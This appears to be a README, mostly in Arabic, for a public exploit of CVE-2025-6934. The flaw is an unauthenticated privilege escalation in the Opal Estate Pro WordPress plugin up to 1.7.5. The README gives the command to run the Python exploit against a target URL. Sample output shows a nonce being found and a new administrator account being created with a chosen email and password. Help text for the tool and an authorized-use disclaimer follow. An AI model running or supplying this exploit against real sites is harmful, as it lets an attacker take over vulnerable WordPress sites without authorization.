
Opal Estate Pro <= 1.7.5 - تصعيد صلاحيات بدون مصادقة
إن البرنامج الإضافي Opal Estate Pro – Property Management and Submission لووردبريس، المستخدم في FullHouse - Real Estate Responsive WordPress Theme، معرض لـ تصعيد الامتيازات في جميع الإصدارات حتى 1.7.5 وما يشملها.
يقوم هذا الاستغلال بلغة بايثون بأتمتة عملية تصعيد الامتيازات عبر:
readme.txt.python CVE-2025-6934.py -u http://target-site.com/login-default/ -mail [email protected] -password nxp1234
[•] Plugin Version Check:
[+] Vulnerable version detected: 1.7.5
[•] Exploit Attempt Started
[+] Nonce Found: 70dd70630b
[+] HTTP Status: 200
[✔] Exploit Successful!
--------------------------
Username : nxploitedadmin
Email : [email protected]
Password : nxp1234
Role : administrator
--------------------------
Exploit By: Khaled_alenazi (Nxploited) | https://github.com/Nxploited
usage: CVE-2025-6934.py [-h] -u URL -mail NEWMAIL -password NEWPASSWORD
CVE-2025-6934 Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g., http://site.com/path/)
-mail, --newmail NEWMAIL
Email to register as admin
-password, --newpassword NEWPASSWORD
Password for new admin user
هذا النص البرمجي مخصص لأغراض التعليم والاختبار الأمني المصرح به فقط. الاستخدام غير المصرح به لهذه الأداة ضد أهداف دون موافقة ممنوع منعًا باتًا.
بواسطة: Khaled_alenazi (Nxploited)